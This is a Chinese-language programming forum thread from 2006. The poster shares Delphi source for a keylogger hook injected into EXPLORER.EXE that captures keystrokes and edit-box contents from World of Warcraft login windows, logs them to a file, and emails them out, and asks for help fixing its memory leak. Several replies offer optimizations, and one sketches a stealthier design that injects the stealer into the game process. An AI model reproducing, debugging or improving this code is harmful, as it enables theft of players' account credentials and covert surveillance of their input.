代码变量内存优化 166分等你来拿!(166分)

x_h168 · 2006-08-02

以下是我自己写的一个监控盗取魔兽登陆帐户密码信息的钩子回调函数(省去了部分细节),程序运行注入到EXPLORER.EXE进程后工作还算正常,但问题是运行一段时间后系统会经常提示虚拟内存不足,我想这肯定是我的代码变量处理不够正常合理的原因,请哪位高手花点时间看下小弟的代码,给点提示和意见教小弟优化一下,不胜感激! function HookRecordProc(nCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; var  Kbs: TKeyboardState;  WChar:array[0..15] of char;  buffer1:array[0..256] of char;  FindHwnd,FindWindowStrHwnd,PID:Hwnd;  LogFile:TextFile;  NowEventMsg:string;  tempstr:string; begin  SetLength(NowEventMsg, 0);  if (nCode = HC_ACTION) and ((PEventMsg(lParam).message = WM_KEYDOWN) or (PEventMsg(lParam).message =WM_LBUTTONDOWN) or (PEventMsg(lParam).message =WM_RBUTTONDOWN)) then  //响应为键盘和鼠标动作  begin    FindHwnd:=GetForegroundWindow();    GetWindowThreadProcessId(FindHwnd, @PID);        Getwindowtext(FindHwnd, Buffer1,SizeOf(Buffer1));    //取得窗体的名称      if (HookProgramPath<>FindPath(PID))  then    begin      if not FileExists(GetWindowsDirectory+HookSaveFile)then      begin        AssignFile(LogFile,GetWindowsDirectory+HookSaveFile);        ReWrite(LogFile);        Append(LogFile);        WriteLn(LogFile,'主机:'+ GetComputerNameString+':'+LocalIP +#13#10);        CloseFile(LogFile);      end;      AssignFile(LogFile,GetWindowsDirectory+HookSaveFile);      Append(LogFile);      HookString:=HookString+#13#10;      if NowWindowStr<>'' then HookString:=HookString+'窗口信息:'+NowWindowStr+#13#10;      SetLength(NowWindowStr, 0);      WriteLn(LogFile,HookString);      CloseFile(LogFile);      HookString:='';      HookProgramPath:='';    end;    HookFormTitle:=Buffer1;    HookProgramPath:=FindPath(PID);    //把新的程序路径放进HookProgramPath    HookString:='窗口标题:'+HookFormTitle +  #13#10 + '操作记录:';    if (PEventMsg(lParam).message = WM_KEYDOWN) then    //键盘反应    begin      GetKeyboardState(Kbs); // 取键盘状态      ToAscii(PEventMsg(lParam).paramL, PEventMsg(lparam).paramH, Kbs, WChar, 0);  //键码转换      if (WChar[0]=#9) then NowEventMsg:='[TAB]'        else if (WChar[0]=#8)  then NowEventMsg:='[BackSpace]'        else if (WChar[0]=#27) then NowEventMsg:='[Esc]'        else if (WChar[0]=#13) then NowEventMsg:='[Enter]'     // 回车补#10        else if (WChar[0]<>'') then NowEventMsg:=WChar[0];      if (ToAscii(PEventMsg(lParam).paramL, PEventMsg(lparam).paramH, Kbs, WChar, 0)<>1) then NowEventMsg:=KeyResult(Peventmsg(lparam)^.paramL,Peventmsg(lparam)^.paramH);  ////键盘控制键处理    end;    SetLength(NowEventMsg, Length(NowEventMsg));    if  AnsiContainsText(HookFormTitle,'魔兽世界') then    begin      HookString:=HookString+NowEventMsg;   //增加操作记录      SetLength(NowWindowStr, 0);      FindWindowStrHwnd:= FindWindowEx(FindHwnd, 0, nil, nil); //查找列出所有控件信息      while(FindWindowStrHwnd<>0) do      begin        GetClassName(FindWindowStrHwnd, Buffer1,SizeOf(Buffer1));        if AnsiContainsText(Buffer1,'ComboBox') or AnsiContainsText(Buffer1,'Edit') then        begin            if GetEditText(FindWindowStrHwnd)<>'' then NowWindowStr:=NowWindowStr+GetEditText(FindWindowStrHwnd)+'|';        end;        FindWindowStrHwnd:= FindWindowEx(FindHwnd,FindWindowStrHwnd, nil, nil);      end;      SetLength(NowWindowStr,length(NowWindowStr));    end;  //发送监控记录    tempstr:='';    HookString:='';    assignfile(LogFile,GetWindowsDirectory+HookSaveFile);    reset(LogFile);    while not eof(LogFile) do    begin      if (not eof(LogFile)) then      begin        HookString:=HookString+tempstr+#13#10;      end;      readln(LogFile,tempstr);    end;    closefile(LogFile);    if InternetConnected and IsEMail('TMAIL') then    begin      SendEMail(TMAIL,HookString);      DeleteFile(GetWindowsDirectory+HookSaveFile);      RemoveDirFiles(GetWindowsDirectory+'temp');    end;    //清空信息重新记录    tempstr:='';    HookString:='';  end;  // 传给下一个钩子处理, 并且返回它的返回值  Result := CallNextHookEx(HookKeyRecord, nCode, wParam, lParam); end;

CoolSlob · 2006-08-02

>>注入到EXPLORER.EXE进程后工作还算正常 >>运行一段时间后系统会经常提示虚拟内存不足 这应该不算正常吧？代码中看不出问题的地方。

x_h168 · 2006-08-02

我说还算正常是指功能正常,我在多台机子上都有运行测试,都有提示虚拟内存不足的现象,肯定还是哪里没处理好的问题.

网中戏 · 2006-08-02

可能是没有完全释放

tt.t · 2006-08-02

没细看，但 1.如果仅盗取魔兽就不要记录所有窗口的输入。 2.写记录文件，发送监控记录最好另开线程。 或者注入explorer的代码仅做监控魔兽之用（用cbt或shell hook），发现魔兽在把记录代码/dll注入魔兽去。 现在的代码点点鼠标都会尝试记录，太离谱了。

lqcros · 2006-08-02

NowEventMsg 这个是局部变量 SetLength(NowEventMsg, Length(NowEventMsg)); //这句是不是有问题 //清空信息重新记录时 SetLength(NowEventMsg, 0); SetLength(NowWindowStr,0);

x_h168 · 2006-08-03

SetLength(NowEventMsg, Length(NowEventMsg)); //这句是不是有问题 SetLength(NowEventMsg, 0); SetLength(NowWindowStr,0); 上面那几句也是在出现了所说问题后我才加上的,我总觉得是那些记录的字符串变量没处理好的问题.  tt.t 说的我觉得有些道理,我这个代码的确是任何时候都在记录,肯定比较耗资源,请问有没有效率比较高的现成代码发出来学习学习.

tt.t · 2006-08-03

说下思路吧，注入dll到explorer，dll中设全局shell hook，监控窗口激活，发现魔兽将盗取密码代码或dll注入魔兽主程序，子类化密码输入窗口或设置键盘钩子监控输入，记录密码。然后再发送什么的。这只是针对你的思路提出的改进方法，适用于一般程序不知对魔兽怎么样。

x_h168 · 2006-08-03

这样的话好像在系统资源消耗方面是比较好些,但这样做程序注入中再写一个注入的过程,程序代码是不是显得就复杂了麻烦了些了呀,要是有个示例代码就好了.

zhaokaien · 2006-08-03

顶一下吧

tt.t · 2006-08-03

复杂？呵呵，那样才有趣呀。 你想要什么样的示例代码？ 我可不会帮你写偷密码的程序的:&quot

x_h168 · 2006-08-03

我并不是要你写啦,其实类似这样的代码肯定有许多人写过的,只是没收集到,不过还是谢谢你./

代码变量内存优化 166分等你来拿!(166分)

x_h168

Unregistered / Unconfirmed

CoolSlob

Unregistered / Unconfirmed

x_h168

Unregistered / Unconfirmed

网中戏

Unregistered / Unconfirmed

tt.t

Unregistered / Unconfirmed

lqcros

Unregistered / Unconfirmed

x_h168

Unregistered / Unconfirmed

tt.t

Unregistered / Unconfirmed

x_h168

Unregistered / Unconfirmed

zhaokaien

Unregistered / Unconfirmed

tt.t

Unregistered / Unconfirmed

x_h168

Unregistered / Unconfirmed

Similar threads